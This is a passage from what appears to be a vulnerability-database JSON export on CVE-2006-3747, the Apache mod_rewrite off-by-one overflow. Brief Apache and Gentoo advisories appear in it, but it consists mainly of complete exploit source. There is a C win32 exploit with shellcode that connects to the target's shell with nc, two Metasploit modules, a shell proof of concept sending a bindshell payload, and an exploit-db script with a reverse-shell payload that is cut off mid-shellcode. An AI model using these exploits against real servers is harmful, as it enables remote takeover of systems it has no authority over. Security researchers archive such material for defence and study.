\n\"\\x70\\x12\\xee\\xc6\\x23\\x89\\xfc\\xec\\x47\\x50\\xe6\\x5c\\x99\\x34\\x0b\\x38\" \n\"\\x4d\\xb3\\x01\\xc5\\xc8\\xb1\\xda\\x33\\xed\\x74\\x54\\xc5\\xce\\x8a\\x50\\x69\" \n\"\\x4b\\x8a\\x40\\x69\\x5b\\x8a\\xfc\\xea\\x7e\\xb1\\x12\\x67\\x7e\\x8a\\x8a\\xdb\" \n\"\\x8d\\xb1\\xa7\\x20\\x68\\x1e\\x54\\xc5\\xce\\xb3\\x13\\x6b\\x4d\\x26\\xd3\\x52\" \n\"\\xbc\\x74\\x2d\\xd3\\x4f\\x26\\xd5\\x69\\x4d\\x26\\xd3\\x52\\xfd\\x90\\x85\\x73\" \n\"\\x4f\\x26\\xd5\\x6a\\x4c\\x8d\\x56\\xc5\\xc8\\x4a\\x6b\\xdd\\x61\\x1f\\x7a\\x6d\" \n\"\\xe7\\x0f\\x56\\xc5\\xc8\\xbf\\x69\\x5e\\x7e\\xb1\\x60\\x57\\x91\\x3c\\x69\\x6a\" \n\"\\x41\\xf0\\xcf\\xb3\\xff\\xb3\\x47\\xb3\\xfa\\xe8\\xc3\\xc9\\xb2\\x27\\x41\\x17\" \n\"\\xe6\\x9b\\x2f\\xa9\\x95\\xa3\\x3b\\x91\\xb3\\x72\\x6b\\x48\\xe6\\x6a\\x15\\xc5\" \n\"\\x6d\\x9d\\xfc\\xec\\x43\\x8e\\x51\\x6b\\x49\\x88\\x69\\x3b\\x49\\x88\\x56\\x6b\" \n\"\\xe7\\x09\\x6b\\x97\\xc1\\xdc\\xcd\\x69\\xe7\\x0f\\x69\\xc5\\xe7\\xee\\xfc\\xea\" \n\"\\x93\\x8e\\xff\\xb9\\xdc\\xbd\\xfc\\xec\\x4a\\x26\\xd3\\x52\\xe8\\x53\\x07\\x65\" \n\"\\x4b\\x26\\xd5\\xc5\\xc8\\xd9\\x03\\x3a\"; \n \nint main(int argc, char *argv[]) \n{ \nint sockfd, numbytes; \nchar buf[MAXDATASIZE]; \nstruct hostent *he; \nstruct sockaddr_in their_addr; \nprintf(\" Exploit: apache mod rewrite exploit (win32)\\n\" \n\" By: fabio/b0x (oc-192, old CoTS member)\\n\" \n\"Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard\\n\" \n); \nif (argc != 3) { \nprintf(\" Usage: ./apache hostname rewrite_path\\n\"); \nexit(1); \n} \nprintf(\"\\n[+]Preparing payload\\n\"); \n \nchar payload[748]; \nsprintf(payload,\"GET /%s%s%s%s%s\\r\\n\\r\\n\\0\",argv[2],get,shellcode,finish,argv[1]); \n \nprintf(\"[+]Connecting...\\n\"); \nif ((he=gethostbyname(argv[1])) == NULL) { \nprintf(\"[-]Cannot resolv hostname...\\n\"); \nexit(1); \n} \nif ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) { \nprintf(\"[-]Socket error...\\n\"); \nexit(1); \n} \n \ntheir_addr.sin_family = AF_INET; \ntheir_addr.sin_port = htons(PORT); \ntheir_addr.sin_addr = *((struct in_addr *)he->h_addr); \nmemset(their_addr.sin_zero, '\\0', sizeof their_addr.sin_zero); \nif (connect(sockfd, (struct sockaddr *)&their_addr, \nsizeof(struct sockaddr)) == -1) { \nprintf(\"[-]Unable to connect\\n\"); \nexit(1); \n} \nprintf(\"[+]Connected\\n[+]Sending...\\n\"); \nif (send(sockfd, payload, strlen(payload), 0) == -1){ \nprintf(\"[-]Unable to send\\n\"); \nexit(1); \n} \nprintf(\"[+]Sent\\n\"); \nclose(sockfd); \nprintf(\"[+]Starting second stage...\\n\"); \nsleep(3); \nprintf(\"[+]Connecting...\\n\"); \nif ((he=gethostbyname(argv[1])) == NULL) { \nprintf(\"[-]Cannot resolv hostname...\\n\"); \nexit(1); \n} \nif ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) { \nprintf(\"[-]Socket error...\\n\"); \nexit(1); \n} \n \ntheir_addr.sin_family = AF_INET; \ntheir_addr.sin_port = htons(PORT2); \ntheir_addr.sin_addr = *((struct in_addr *)he->h_addr); \nmemset(their_addr.sin_zero, '\\0', sizeof their_addr.sin_zero); \nif (connect(sockfd, (struct sockaddr *)&their_addr, \nsizeof(struct sockaddr)) == -1) { \nprintf(\"[-]Unable to connect\\n\"); \nexit(1); \n} \nprintf(\"[+]Connected\\n[+]Sending...\\n\"); \nif (send(sockfd, payload2, strlen(payload2), 0) == -1){ \nprintf(\"[-]Unable to send\\n\"); \nexit(1); \n} \nprintf(\"[+]Sent\\n[+]Connecting to shell\\n\"); \nclose(sockfd); \n \n \nsleep(3); \nint exec; \nchar what[1024]; \nsprintf(what,\" nc -w 10 %s 4445\",argv[1]); \nexec=system(what); \nif (exec!=0){ \nprintf(\"[-]Not hacked\\n\"); \n} else { \nprintf(\"[+]Owned\\n\"); \n} \nexit(1); \n} \n \n`\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/56989/apache2058-rewrite.txt"}, {"lastseen": "2016-12-05T22:20:00", "description": "", "published": "2008-01-07T00:00:00", "type": "packetstorm", "title": "apache-mod-rewrite.rb.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2008-01-07T00:00:00", "id": "PACKETSTORM:62377", "href": "https://packetstormsecurity.com/files/62377/apache-mod-rewrite.rb.txt.html", "sourceData": "`require 'msf/core' \n \nmodule Msf \n \nclass Exploits::Windows::Http::Apache_mod_rewrite < Msf::Exploit::Remote \n \ninclude Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Mod_Rewrite escape_absolute_uri() Off-By-One Buffer Overflow', \n'Description' => %q{ \nThis module exploits a off-by-one buffer overflow. RewriteRule must be enabled and rule must meets this criteria: \n* beginning of the rewritten URL is controlled. \n* flags on the rule do not include the Forbidden (F), Gone (G), or NoEscape (NE) flag \n}, \n'Author' => [ 'Marcin Kozlowski' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 0001 $', \n'References' => \n[ \n['CVE', '2006-3747'], \n['BID', '19204'], \n['OSVDB', '27588'], \n \n], \n'Privileged' => false, \n'Payload' => \n{ \n'BadChars' => \"\\x00\", \n'EncoderType' => Msf::Encoder::Type::AlphanumMixed, \n'DisableNops' => true, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n['Apache 1.3 branch (>1.3.28 and <1.3.37), Apache 2.0 branch (2.0.46 and <2.0.59), Apache 2.2 branch (>2.2.0 and <2.2.3)', {'Ret' => 0x90909090 }], # our ret is NOP, since our shellcode is shortly after and will be execute next \n], \n'DisclosureDate' => 'Aug 28 2006')) \n \nregister_options( \n[ \nOptString.new('REWRITEPATH', [true, \"Rewrite path\"]), \nOpt::RPORT(80) \n], self.class ) \nend \n \ndef exploit \nconnect \n \nrewritepath = datastore['REWRITEPATH'] \n \n \nuri = \"/#{rewritepath}/ldap://\"+rand_text_alphanumeric(rand(16))+\"/\"+rand_text_alphanumeric(rand(32))+\"%3f\"+rand_text_alphanumeric(rand(8))+\"%3f\"+rand_text_alphanumeric(rand(8))+\"%3f\"+rand_text_alphanumeric(rand(16))+\"%3f\"+rand_text_alphanumeric(rand(8))+\"%3f%90\" \nuri += payload.encoded \n \n \nres = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\" \nprint_status(\"Trying ...\") \nsock.put(res) \nsock.close \n \nhandler \ndisconnect \nend \n \n \n \nend \nend \n`\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/62377/apache-mod-rewrite.rb.txt"}, {"lastseen": "2016-12-05T22:14:41", "description": "", "published": "2006-08-27T00:00:00", "type": "packetstorm", "title": "modrewritepoc.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2006-08-27T00:00:00", "id": "PACKETSTORM:49400", "href": "https://packetstormsecurity.com/files/49400/modrewritepoc.txt.html", "sourceData": "` \nPublic release date of POC/Exploit: 2006-08-20 \nAuthor: Jacobo Avariento Gimeno \nCVE id: CVE-2006-3747 \nBugtraq id: 19204 \nCERT advisory: VU#395412 \nSeverity: high \n \n \nIntroduction \n---- \nOn July 28 2006 Mark Dowd (McAfee Avert Labs) reported a vulnerability \nfound in mod_rewrite apache module to the bugtraq mailing list. \nThe vulnerable function is escape_absolute_uri() and the problem only \ncould be arised when mod_rewrite is dealing with an LDAP URL, a \nmalformed LDAP URL could trigger an off-by-one overflow in certain \n(special) situations and a possible attacker could cause a \ndenial-of-service or execute arbitrary code with the privileges of \nthe apache user. \nTo exploit this vulnerability isn't necessary an LDAP-specific rule, \nbut must have a rule which the user can control the inital part of the \nremapped URL, i.e.: \n \nRewriteRule foo/(.*) $1 \n \nAny version of the Apache HTTP server: \n* 1.3 branch: >1.3.28 and <1.3.37 \n* 2.0 branch: >2.0.46 and <2.0.59 \n* 2.2 branch: >2.2.0 and <2.2.3 \nis vulnerable. \n \n \nAnalysis of the vulnerable code \n---- \n \n2696 /* escape absolute uri, which may or may not be path oriented. \n2697 * So let's handle them differently. \n2698 */ \n2699 static char *escape_absolute_uri(ap_pool *p, char *uri, \nunsigned scheme) \n2700 { \n2701 char *cp; \n2702 ... \n... \n2727 /* special thing for ldap. \n2728 * The parts are separated by question marks. From RFC 2255: \n2729 * ldapurl = scheme \"://\" [hostport] [\"/\" \n2730 * [dn [\"?\" [attributes] [\"?\" [scope] \n2731 * [\"?\" [filter] [\"?\" extensions]]]]]] \n2732 */ \n2733 if (!strncasecmp(uri, \"ldap\", 4)) { \n2734 char *token[5]; \n2735 int c = 0; \n2736 \n2737 token[0] = cp = ap_pstrdup(p, cp); \n2738 while (*cp && c < 5) { \n2739 if (*cp == '?') { \n2740 token[++c] = cp + 1; \n2741 *cp = '\\0'; \n2742 } \n2743 ++cp; \n2744 } \n \nIn the case that an LDAP URI contains a fifth '?' the line 2740 causes \nan off-by-one overflow, it's writing in token[5]. \nTo exploit this problem is necessary a vulnerable apache version and a \nspecific stack frame layout. \n \nProof of concept \n---- \n \nTo know if your apache vulnerable version could be successful \nexploited, write this rule in your httpd.conf or .htaccess file: \n \nRewriteRule kung/(.*) $1 \n \nAnd try to access to the following URL: \n/kung/ldap://localhost/AAAAAAAAAAAAAAAAAAAAA%3FAAAAAAAAAAAAA% \n3FAAAAAAAAAAAAAAA%3FAAAAAAAAAA%3FAAAAAAAAAA%3FBBBBBBBBBBBBBB \n \nIf your web server doesn't reply you with a '302 Found' page or a \nSegmentation Fault appears in your error_log, an apache child has \ncrashed and your web server is vulnerable and exploitable. \n \nExploit \n---- \n \nThis exploit was successful executed on Apache 1.3.34, debian \nsarge package: \n \n#!/bin/sh \n# Exploit for Apache mod_rewrite off-by-one. \n# Vulnerability discovered by Mark Dowd. \n# CVE-2006-3747 \n# \n# by jack <jack\\x40gulcas\\x2Eorg> \n# 2006-08-20 \n# \n# Thx to xuso for help me with the shellcode. \n# \n# I suppose that you've the \"RewriteRule kung/(.*) $1\" rule if not \n# you must recalculate adressess. \n# \n# Shellcode is based on Taeho Oh bindshell on port 30464 and modified \n# for avoiding apache url-escape.. Take a look is quite nice ;) \n# \n# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at \n# 0x0834ae77 for any other version/system find it. \n# \n# Gulcas rulez :P \n \necho -e \"mod_rewrite apache off-by-one overflow\\nby jack <jack\\x40gulcas \n\\x2eorg>\\n\\n\" \n \nif [ $# -ne 1 ] ; then \necho \"Usage: $0 webserver\" \nexit \nfi \n \nhost=$1 \n \necho -ne \"GET /kung/ldap://localhost/`perl -e 'print \"%90\"x128'`%89%e6% \n31%c0%31 %db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3% \n01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04% \n31%c0%89%46%10%b0%10%89%46%08% b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66% \nb3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31% \nc9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8% \n23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76% \n08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db% \ncd %80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC% \n77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\\r\\nHost: \n$host\\r\\n\\r\\n\" | nc $host 80 \n \n \nMore info is coming at http://ciberjacobo.com/sec/mod_rewrite.html \n \n \n-- \nJacobo Avariento Gimeno \nhttp://ciberjacobo.com \nOpenPGP key: http://ciberjacobo.com/key.pem \n`\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/49400/modrewritepoc.txt"}], "httpd": [{"lastseen": "2020-12-24T14:26:52", "bulletinFamily": "software", "cvelist": ["CVE-2006-3747"], "description": "\n\nAn off-by-one flaw exists in the Rewrite module, mod_rewrite.\nDepending on the manner in which Apache httpd was compiled, this\nsoftware defect may result in a vulnerability which, in combination\nwith certain types of Rewrite rules in the web server configuration\nfiles, could be triggered remotely. For vulnerable builds, the nature\nof the vulnerability can be denial of service (crashing of web server\nprocesses) or potentially allow arbitrary code execution.\n\n", "edition": 5, "modified": "2006-07-27T00:00:00", "published": "2006-07-21T00:00:00", "id": "HTTPD:926B81EFA0651C6A6A14D204526A10AC", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < None: mod_rewrite off-by-one error", "type": "httpd", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "cvelist": ["CVE-2006-3747"], "description": "\n\nAn off-by-one flaw exists in the Rewrite module, mod_rewrite.\nDepending on the manner in which Apache httpd was compiled, this\nsoftware defect may result in a vulnerability which, in combination\nwith certain types of Rewrite rules in the web server configuration\nfiles, could be triggered remotely. For vulnerable builds, the nature\nof the vulnerability can be denial of service (crashing of web server\nprocesses) or potentially allow arbitrary code execution.\n\n", "edition": 1, "modified": "2006-07-27T00:00:00", "published": "2006-07-21T00:00:00", "id": "HTTPD:6C9DAB876E616F2E0DD054F6CAEC074D", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.0.59: mod_rewrite off-by-one error", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "cvelist": ["CVE-2006-3747"], "description": "\n\nAn off-by-one flaw exists in the Rewrite module, mod_rewrite.\nDepending on the manner in which Apache httpd was compiled, this\nsoftware defect may result in a vulnerability which, in combination\nwith certain types of Rewrite rules in the web server configuration\nfiles, could be triggered remotely. For vulnerable builds, the nature\nof the vulnerability can be denial of service (crashing of web server\nprocesses) or potentially allow arbitrary code execution.\n\n", "edition": 1, "modified": "2006-07-27T00:00:00", "published": "2006-07-21T00:00:00", "id": "HTTPD:72F2F52813642A1A16F01F74291257B4", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 1.3.37: mod_rewrite off-by-one error", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "cvelist": ["CVE-2006-3747"], "description": "\n\nAn off-by-one flaw exists in the Rewrite module, mod_rewrite.\nDepending on the manner in which Apache httpd was compiled, this\nsoftware defect may result in a vulnerability which, in combination\nwith certain types of Rewrite rules in the web server configuration\nfiles, could be triggered remotely. For vulnerable builds, the nature\nof the vulnerability can be denial of service (crashing of web server\nprocesses) or potentially allow arbitrary code execution.\n\n", "edition": 1, "modified": "2006-07-27T00:00:00", "published": "2006-07-21T00:00:00", "id": "HTTPD:0D1550F3E416AE3560367A9812052A33", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.2.3: mod_rewrite off-by-one error", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:47:05", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3747"], "description": "### Background\n\nThe Apache HTTP server is one of the most popular web servers on the Internet. The Apache module mod_rewrite provides a rule-based engine to rewrite requested URLs on the fly. \n\n### Description\n\nAn off-by-one flaw has been found in Apache's mod_rewrite module by Mark Dowd of McAfee Avert Labs. This flaw is exploitable depending on the types of rewrite rules being used. \n\n### Impact\n\nA remote attacker could exploit the flaw to cause a Denial of Service or execution of arbitrary code. Note that Gentoo Linux is not vulnerable in the default configuration. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Apache users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose www-servers/apache", "edition": 1, "modified": "2007-12-30T00:00:00", "published": "2006-08-01T00:00:00", "id": "GLSA-200608-01", "href": "https://security.gentoo.org/glsa/200608-01", "type": "gentoo", "title": "Apache: Off-by-one flaw in mod_rewrite", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-08-19T23:30:54", "description": "This module exploits the mod_rewrite LDAP protocol scheme handling flaw discovered by Mark Dowd, which produces an off-by-one overflow. Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable. This module requires REWRITEPATH to be set accurately. In addition, the target must have 'RewriteEngine on' configured, with a specific 'RewriteRule' condition enabled to allow for exploitation. The flaw affects multiple platforms, however this module currently only supports Windows based installations.\n", "published": "2009-03-10T06:42:11", "type": "metasploit", "title": "Apache Module mod_rewrite LDAP Protocol Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2017-11-08T16:00:24", "id": "MSF:EXPLOIT/WINDOWS/HTTP/APACHE_MOD_REWRITE_LDAP", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache Module mod_rewrite LDAP Protocol Buffer Overflow',\n 'Description' => %q{\n This module exploits the mod_rewrite LDAP protocol scheme handling\n flaw discovered by Mark Dowd, which produces an off-by-one overflow.\n Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.\n This module requires REWRITEPATH to be set accurately. In addition,\n the target must have 'RewriteEngine on' configured, with a specific\n 'RewriteRule' condition enabled to allow for exploitation.\n\n The flaw affects multiple platforms, however this module currently\n only supports Windows based installations.\n },\n 'Author' => 'aushack',\n 'References' =>\n [\n [ 'CVE', '2006-3747' ],\n [ 'OSVDB', '27588' ],\n [ 'BID', '19204' ],\n [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html' ],\n [ 'EDB', '3680' ],\n [ 'EDB', '3996' ],\n [ 'EDB', '2237' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'AllowWin32SEH' => true\n },\n 'Privileged' => true,\n 'Platform' => ['win'],\n 'Payload' =>\n {\n 'Space' => 636,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\",\n 'EncoderType' => Msf::Encoder::Type::AlphanumUpper,\n 'StackAdjustment' => -3500,\n 'DisableNops' => 'True',\n },\n 'Targets' =>\n [\n [ 'Automatic', {} ], # aushack tested OK 20090310 win32\n ],\n 'DisclosureDate' => 'Jul 28 2006',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('REWRITEPATH', [true, \"The mod_rewrite URI path\", \"rewrite_path\"]),\n ])\n end\n\n\n def check\n res = send_request_raw({\n 'uri' => '/',\n 'version' => '1.1',\n }, 2)\n\n if (res.to_s =~ /Apache/) # This could be smarter.\n return Exploit::CheckCode::Detected\n end\n return Exploit::CheckCode::Safe\n\n end\n\n def exploit\n\n # On Linux Apache, it is possible to overwrite EIP by\n # sending ldap://<buf> ... TODO aushack\n\n trigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90'\n\n print_status(\"Sending payload.\")\n send_request_raw({\n 'uri' => normalize_uri(datastore['REWRITEPATH']) + trigger + payload.encoded,\n 'version' => '1.0',\n }, 2)\n handler\n end\nend\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/apache_mod_rewrite_ldap.rb"}], "exploitdb": [{"lastseen": "2016-01-31T19:03:48", "description": "Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32). CVE-2006-3747. Remote exploit for windows platform", "published": "2007-04-07T00:00:00", "type": "exploitdb", "title": "Apache Mod_Rewrite Off-by-one Remote Overflow Exploit Win32", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2007-04-07T00:00:00", "id": "EDB-ID:3680", "href": "https://www.exploit-db.com/exploits/3680/", "sourceData": "#!/bin/sh\r\n# Exploit for Apache mod_rewrite off-by-one(Win32).\r\n#\r\n# by axis <axis@ph4nt0m>\r\n# http://www.ph4nt0m.org\r\n# 2007-04-06\r\n#\r\n# Tested on Apache 2.0.58 (Win32)\r\n# Windows2003 CN SP1\r\n#\r\n# Vulnerable Apache Versions:\r\n# * 1.3 branch: >1.3.28 and <1.3.37\r\n# * 2.0 branch: >2.0.46 and <2.0.59\r\n# * 2.2 branch: >2.2.0 and <2.2.3\r\n#\r\n#\r\n# Vulnerability discovered by Mark Dowd.\r\n# CVE-2006-3747\r\n# \r\n# first POC by jack <jack\\x40gulcas\\x2Eorg>\r\n# 2006-08-20\r\n# http://www.milw0rm.com/exploits/2237\r\n#\r\n#\r\n# \r\n# to successfully exploit the vuln,there are some conditions\r\n# http://www.vuxml.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html\r\n# \r\n# \r\n# some compilers added padding to the stack, so they could not be exploited,like gcc under redhat\r\n# \r\n# for more details about the vuln please see:\r\n# http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded\r\n# \r\n# \r\n# no opcodes needed under windows!\r\n# it will directly run our shellcode\r\n# \r\n# my apache config file\r\n# [httpd.conf]:\r\n# RewriteEngine on\r\n# RewriteRule 1/(.*) $1\r\n# RewriteLog \"logs/rewrite.log\"\r\n# RewriteLogLevel 3\r\n# \r\n# \r\n# Usage:\r\n# [axis@security-lab2 xploits]$ sh mod_rewrite.sh 10.0.76.141\r\n# mod_rewrite apache off-by-one overflow\r\n# \r\n# [axis@opensystemX axis]$ nc -vv -n -l -p 1154\r\n# listening on [any] 1154 ...\r\n# connect to [x.x.x.111] from (UNKNOWN) [10.0.76.141] 4077\r\n# Microsoft Windows [\u00a1\u00e3?\u00a1\u00c0? 5.2.3790]\r\n# (C) \u00a1\u00e3?\u00a8\u00a8\u00a1\u00a7?\u00a8\u00b4\u00a8\u00aeD 1985-2003 Microsoft Corp.\r\n# \r\n# D:\\Apache\\Apache2>exit\r\n# exit\r\n# sent 5, rcvd 100\r\n# \r\n# \r\n# \r\n# shellcode \u00b5\u00c4badchar\u00a3\u00ac\u00ce\u00d2\u00d5\u00e2\u00c0\u00ef\u00d3\u00c3\u00b5\u00c4\u00a3\u00ac\u00c6\u00e4\u00ca\u00b5\u00b2\u00bb\u00d0\u00e8\u00d2\u00aa\u00c4\u00c7\u00c3\u00b4\u00b6\u00e0\r\n# \u00ce\u00d2\u00b8\u00fa\u00b5\u00bd\u00c1\u00bd\u00b8\u00f6badchar\u00ca\u00c7 0x3f\u00ba\u00cd 0x0b \u00c6\u00e4\u00cb\u00fb\u00b6\u00bc\u00ca\u00c7\u00d2\u00d4\u00c7\u00b0\u00c9\u00fa\u00b3\u00c9shellcode\u00cf\u00b0\u00b9\u00df\u00d0\u00d4\u00b1\u00a3\u00c1\u00f4\u00b5\u00c4\r\n# 0x00 0x3a 0x22 0x3b 0x7d 0x7b 0x3c 0x3e 0x5c 0x5d 0x3f 0x0b\r\n#\r\n\r\n\r\necho -e \"mod_rewrite apache off-by-one overflow\"\r\n\r\n\r\nif [ $# -ne 1 ] ; then\r\n echo \"Usage: $0 webserver\"\r\n exit\r\nfi\r\n\r\nhost=$1\r\n\r\n#use ldap:// to trigger the vuln, \"Ph4nt0m\" is any arbitrary string\r\necho -ne \"GET /1/ldap://ph4nt0m/`perl -e 'print \"Ph4nt0m\"x5'`\\ \r\n# %3f to trigger the vuln\r\n%3fA%3fA%3f\\ \r\n#string \"CCCC..\" is any arbitrary string, use %3f to trigger the vuln\r\n#%90 is the machine code we will jmp to(NOP),run shellcode from here\r\n`perl -e 'print \"C\"x10'`%3fC%3f%90\\ \r\n# shellcode,reverse shell to 192.168.0.1 ,port 1154 alpha2 encoded\r\n`perl -e 'print \"\\ \r\n\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49\\\r\n\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x49\\x49\\x51\\x5a\\x6a\\x63\\\r\n\\x58\\x30\\x42\\x30\\x50\\x42\\x6b\\x42\\x41\\x73\\x42\\x32\\x42\\x41\\x41\\x32\\\r\n\\x41\\x41\\x30\\x41\\x41\\x58\\x50\\x38\\x42\\x42\\x75\\x69\\x79\\x79\\x6c\\x51\\\r\n\\x7a\\x6a\\x4b\\x50\\x4d\\x4d\\x38\\x6b\\x49\\x79\\x6f\\x49\\x6f\\x6b\\x4f\\x65\\\r\n\\x30\\x4c\\x4b\\x72\\x4c\\x45\\x74\\x51\\x34\\x4e\\x6b\\x71\\x55\\x77\\x4c\\x6c\\\r\n\\x4b\\x33\\x4c\\x64\\x45\\x33\\x48\\x64\\x41\\x5a\\x4f\\x4c\\x4b\\x72\\x6f\\x36\\\r\n\\x78\\x4c\\x4b\\x73\\x6f\\x45\\x70\\x66\\x61\\x4a\\x4b\\x53\\x79\\x4e\\x6b\\x44\\\r\n\\x74\\x4e\\x6b\\x73\\x31\\x38\\x6e\\x55\\x61\\x79\\x50\\x6c\\x59\\x6c\\x6c\\x4b\\\r\n\\x34\\x6f\\x30\\x74\\x34\\x34\\x47\\x59\\x51\\x5a\\x6a\\x76\\x6d\\x76\\x61\\x6f\\\r\n\\x32\\x5a\\x4b\\x79\\x64\\x55\\x6b\\x33\\x64\\x51\\x34\\x41\\x38\\x30\\x75\\x4b\\\r\n\\x55\\x6e\\x6b\\x33\\x6f\\x44\\x64\\x46\\x61\\x7a\\x4b\\x32\\x46\\x6e\\x6b\\x34\\\r\n\\x4c\\x42\\x6b\\x6e\\x6b\\x73\\x6f\\x77\\x6c\\x54\\x41\\x58\\x6b\\x43\\x33\\x74\\\r\n\\x6c\\x6c\\x4b\\x4d\\x59\\x50\\x6c\\x74\\x64\\x75\\x4c\\x52\\x41\\x6f\\x33\\x50\\\r\n\\x31\\x6b\\x6b\\x72\\x44\\x4c\\x4b\\x50\\x43\\x66\\x50\\x6c\\x4b\\x33\\x70\\x64\\\r\n\\x4c\\x6c\\x4b\\x74\\x30\\x65\\x4c\\x4e\\x4d\\x4e\\x6b\\x53\\x70\\x47\\x78\\x33\\\r\n\\x6e\\x51\\x78\\x4c\\x4e\\x52\\x6e\\x56\\x6e\\x58\\x6c\\x50\\x50\\x59\\x6f\\x79\\\r\n\\x46\\x70\\x66\\x62\\x73\\x75\\x36\\x75\\x38\\x66\\x53\\x64\\x72\\x42\\x48\\x53\\\r\n\\x47\\x32\\x53\\x50\\x32\\x71\\x4f\\x71\\x44\\x49\\x6f\\x48\\x50\\x52\\x48\\x5a\\\r\n\\x6b\\x48\\x6d\\x6b\\x4c\\x65\\x6b\\x70\\x50\\x4b\\x4f\\x68\\x56\\x61\\x4f\\x4e\\\r\n\\x69\\x4a\\x45\\x30\\x66\\x6e\\x61\\x78\\x6d\\x67\\x78\\x73\\x32\\x42\\x75\\x52\\\r\n\\x4a\\x75\\x52\\x6b\\x4f\\x7a\\x70\\x61\\x78\\x6b\\x69\\x55\\x59\\x6c\\x35\\x6e\\\r\n\\x4d\\x51\\x47\\x4b\\x4f\\x4e\\x36\\x70\\x53\\x50\\x53\\x56\\x33\\x76\\x33\\x43\\\r\n\\x73\\x32\\x73\\x31\\x53\\x52\\x73\\x6b\\x4f\\x4a\\x70\\x70\\x68\\x6f\\x30\\x6d\\\r\n\\x78\\x35\\x50\\x46\\x61\\x30\\x66\\x30\\x68\\x76\\x64\\x6c\\x42\\x33\\x56\\x70\\\r\n\\x53\\x4e\\x69\\x78\\x61\\x4c\\x55\\x75\\x38\\x4a\\x4c\\x58\\x79\\x4c\\x6a\\x73\\\r\n\\x50\\x53\\x67\\x6b\\x4f